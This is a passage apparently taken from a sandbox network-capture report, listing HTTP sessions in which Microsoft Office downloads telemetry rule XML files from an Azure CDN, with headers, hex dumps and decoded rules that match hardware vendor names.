                                                                        2024-12-03 16:50:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        27192.168.2.44978413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:28 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:28 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:28 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 632
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                        ETag: "0x8DC582BB6E3779E"
                                                                        x-ms-request-id: 9cdeab1e-301e-0000-22b2-42eecc000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165028Z-174f7845968cpnpfhC1EWR3afc00000015qg00000000u1z4
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:28 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        28192.168.2.44978313.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:28 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:28 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:28 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 471
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                        ETag: "0x8DC582BB10C598B"
                                                                        x-ms-request-id: e8c785f0-901e-0048-4ed4-43b800000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165028Z-174f7845968jrjrxhC1EWRmmrs000000168g00000000p6m5
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:28 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        29192.168.2.44978513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:28 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:29 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:28 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 467
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                        ETag: "0x8DC582BA6C038BC"
                                                                        x-ms-request-id: c220f382-901e-0029-3552-43274a000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165028Z-174f7845968n2hr8hC1EWR9cag00000015w000000000a5dn
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:29 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        30192.168.2.44978813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:30 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:30 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:30 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 486
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                        ETag: "0x8DC582BB344914B"
                                                                        x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165030Z-174f7845968cdxdrhC1EWRg0en000000163g00000000nk0y
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:30 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        31192.168.2.44978713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:30 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:30 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:30 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 407
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                        x-ms-request-id: 12c713eb-c01e-0034-6a92-432af6000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165030Z-174f784596886s2bhC1EWR743w000000167000000000h911
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:30 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        32192.168.2.44978913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:30 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:30 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:30 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 427
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                        ETag: "0x8DC582BA310DA18"
                                                                        x-ms-request-id: 5d2ee098-d01e-0066-70f7-44ea17000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165030Z-174f7845968cpnpfhC1EWR3afc00000015y0000000001bhz
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:30 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        33192.168.2.44979013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:30 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:30 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:30 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 486
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                        ETag: "0x8DC582B9018290B"
                                                                        x-ms-request-id: 1383167b-401e-008c-1f3c-4486c2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165030Z-174f7845968j6t2phC1EWRcfe8000000167g00000000xcbx
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:30 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        34192.168.2.44979113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:30 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:31 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:31 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 407
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                        ETag: "0x8DC582B9698189B"
                                                                        x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165031Z-174f7845968xr5c2hC1EWRd0hn0000000r0g00000000k3kv
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:31 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        35192.168.2.44979213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:32 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:32 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:32 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 469
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                        ETag: "0x8DC582BBA701121"
                                                                        x-ms-request-id: a11b7610-d01e-00ad-11d5-43e942000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165032Z-174f7845968jrjrxhC1EWRmmrs000000169g00000000krqt
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:32 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        36192.168.2.44979413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:32 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:33 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:32 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 477
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                        x-ms-request-id: fbe1121d-d01e-0082-7beb-44e489000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165032Z-174f78459685m244hC1EWRgp2c00000016300000000077tk
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:33 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        37192.168.2.44979513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:32 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:33 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:32 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 464
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                        x-ms-request-id: 3e0e4810-b01e-0084-040a-41d736000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165032Z-174f7845968jrjrxhC1EWRmmrs00000016eg000000000zdg
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
